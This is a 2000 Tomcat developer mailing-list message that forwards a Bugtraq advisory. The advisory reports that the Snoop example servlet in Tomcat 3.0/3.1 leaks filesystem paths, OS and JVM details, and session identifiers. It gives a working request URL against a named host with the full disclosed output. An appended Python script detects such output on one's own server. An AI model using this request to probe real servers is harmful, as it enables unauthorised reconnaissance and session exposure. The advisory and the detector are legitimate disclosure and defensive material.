tomcat-dev mailing list archives

From "Christopher Elkins" <celk...@scardini.com>
Subject Fw: [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)
Date Thu, 20 Jul 2000 21:19:47 GMT
Hi, all.

This message was recently posted to the Bugtraq mailing list. I am forwarding it
here for those who don't monitor said list. If this problem is no longer
relevant, please disregard.

--
Christopher Elkins


----- Original Message -----
From: "ET LoWNOISE" <et@CYBERSPACE.ORG>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Wednesday, July 19, 2000 8:56 PM
Subject: [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)


> [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)
>
>
> ====PRODUCT:
> Snoop Servlet on Release Build 3.1 and 3.0 of Tomcat from
> Apache Software Foundation.
>
> http://jakarta.apache.org
>
>
>
> ====PROBLEM:
> The Snoop Servlet will give you too much info (PATHs, OS, etc.)
>
> ====EXPLOIT:
> http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp
>
>
> ====
> Snoop Servlet
>
> Servlet init parameters:
>
> Context init parameters:
>
> Context attributes:
>    javax.servlet.context.tempdir =
> /appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
>    sun.servlet.workdir =
> /appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
>
> Request attributes:
>
> Servlet Name: snoop
> Protocol: HTTP/1.0
> Scheme: http
> Server Name: narco.goverment.sucks.co
> Server Port: 8080
> Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX
> 4.2 POWER_RS; java.vendor=IBM Corporation)
> Remote Addr: xxx.xxx.xxx.xxx
> Remote Host: xxx.xxx.xxx.xxx
> Character Encoding: null
> Content Length: -1
> Content Type: null
> Locale: en
> Default Response Buffer: 8192
>
> Parameter names in this request:
>
> Headers in this request:
>    Host: narco.goverment.sucks.co:8080
>    Accept-Encoding: gzip
>    Cookie: JSESSIONID=To1212mC7833304641226407At
>    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,
> */*
>    Connection: Keep-Alive
>    Accept-Charset: iso-8859-1,*,utf-8
>    User-Agent: Mozilla/4.51 [en] (Winsucks; I)
>    Accept-Language: en
>
> Cookies in this request:
>    JSESSIONID = To1212mC7833304641226407At
>
> Request Is Secure: false
> Auth Type: null
> HTTP Method: GET
> Remote User: null
> Request URI: /examples/jsp/snp/anything.snp
> Context Path: /examples
> Servlet Path: /jsp/snp/anything.snp
> Path Info: null
> Path Trans: null
> Query String: null
>
> Requested Session Id: To1212mC7833304641226407At
> Current Session Id: To1212mC7833304641226407At
> Session Created Time: 964047263477
> Session Last Accessed Time: 964047528749
> Session Max Inactive Interval Seconds: 1800
>
> Session values:
>    numguess = num.NumberGuessBean@6bfa9a1
> ====
> Efrain 'ET' Torres
> et@cyberspace.org
>
> [LoWNOISE] Colombia 2000
>
>
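
Added example (not part of the original post, and not code from Tomcat): a Python check to run over a response body fetched from your own server, reporting whether it is snoop output and which categories of detail it discloses. The field names are taken from the output quoted above; the sample body, its paths, banner and session id are constructed placeholders.

```python
import re

# Constructed sample modelled on the snoop output quoted in the advisory;
# paths, banner and session id are placeholders, not values from a real server.
SAMPLE = """\
Snoop Servlet
Context attributes:
   javax.servlet.context.tempdir = /opt/tomcat/work/localhost_8080%2Fexamples
   sun.servlet.workdir = /opt/tomcat/work/localhost_8080%2Fexamples
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; ExampleOS 1.0)
Request URI: /examples/jsp/snp/anything.snp
Cookies in this request:
   JSESSIONID = EXAMPLESESSIONID0001
Current Session Id: EXAMPLESESSIONID0001
"""

# Field name -> category of information it discloses.
LEAKY_FIELDS = {
    "javax.servlet.context.tempdir": "filesystem path",
    "sun.servlet.workdir": "filesystem path",
    "Server Info": "server/JVM/OS banner",
    "JSESSIONID": "session identifier",
    "Requested Session Id": "session identifier",
    "Current Session Id": "session identifier",
}
FIELD_RE = re.compile(r"^\s*([^:=\n]+?)\s*[:=]\s*(.*\S)\s*$")


def audit_snoop_output(body):
    """Return {category: sorted field names}; {} if body is not snoop output."""
    if "Snoop Servlet" not in body:
        return {}
    findings = {}
    for line in body.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue  # section headings such as "Context attributes:" have no value
        name, value = m.group(1), m.group(2)
        category = LEAKY_FIELDS.get(name)
        if category and value != "null":  # snoop prints "null" for unset fields
            findings.setdefault(category, set()).add(name)
    return {cat: sorted(names) for cat, names in findings.items()}
```

A non-empty result for any URL on a production host means the example servlet is still deployed and reachable there.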

